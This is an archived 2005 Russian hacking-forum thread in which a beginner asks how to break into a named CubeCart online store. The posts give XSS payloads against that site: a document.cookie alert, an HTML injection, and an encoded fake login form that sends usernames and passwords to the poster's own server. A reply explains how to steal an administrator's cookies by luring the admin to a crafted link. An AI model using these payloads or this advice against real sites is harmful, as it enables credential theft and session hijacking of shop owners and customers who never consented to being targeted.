Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Помогите начинающему с sql-injection.

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Помогите начинающему с sql-injection.
Имя
Сообщение << Старые топики   Новые топики >>
Помогите начинающему с sql-injection. - 2005-03-08 18:34:43   
stealthgt

Сообщений: 2
Оценки: 0
Присоединился: 2005-03-08 18:29:04
 Есть корзина CubeCart.

Пробую на примере магазина.. http://parkerdancestudio.com/store/

позволяет делает запросы типа:
login.php?session="><Sсгiрt>а1егt(dосиmеnt.cookie);</Sсгiрt>
index.php?cat_id=5"><body><p><h1>CubeCartXSS Pow@ !!!</h1></p>/<body>

пытался сделать следующее….

search.php?search=%22%3E%3Cform%20action=http://мой сайт/savedb.php%20method=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form>


не работает….

объясните плз почему….

и какие вообще есть варианты инъекций для взлома этого сайта….

спасибо…
Post #: 1
Помогите начинающему с sql-injection. - 2005-03-08 19:11:47   
kreon

Сообщений: 38
Оценки: 0
Присоединился: 2005-03-03 13:00:48
 хмм….. ты что курил? Где такую траву берешь???? Я тоже хачу :)
SQL-Injection - это внедрение zlo-запросов во вражеские базы данных. А то что ты показал - обычный XSS. Низкой степени опасности. Для чего он нужен? Например чтоб получить куки админа.
А имея куки админа….хмм… можно поиметь и самого админа :)
Для этого тебе надо заманить админа на спец-ссылку.
Как её сделать - читай на http://securitylab.ru/
Там в конкусе статей как раз статься про XSS победила.
Ну и хакер почитывай. И больше столько не кури, а то мало-ли что…..
Post #: 2
Помогите начинающему с sql-injection. - 2005-03-08 19:44:01   
stealthgt

Сообщений: 2
Оценки: 0
Присоединился: 2005-03-08 18:29:04
 Камень у меня тут убойный есть…
Офигенная тема….

Ну вообщем я имел ввиду межсайтовый скриптинг…
Все статьи по этому поводу я читал….
Насчет кукисов тоже знаю…

Но все равно не понимаю…
Толи данный шоп кот. я рассматриваю не подвержен этой уязвимости…..

Вообще буду признателен если покажете хоть один действующий пример…
Или дадите ссылку на толковую статью по этому поводу….

из статей… читал следующее:
http://www.bugtraq.ru/library/www/xssanatomy.html
http://www.bugtraq.ru/library/www/advancedxss.html
http://www.xakep.ru/magazine/xa/063/082/1.asp
Post #: 3
Страниц:  [1]
Все форумы >> [В Сети] >> Помогите начинающему с sql-injection.







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.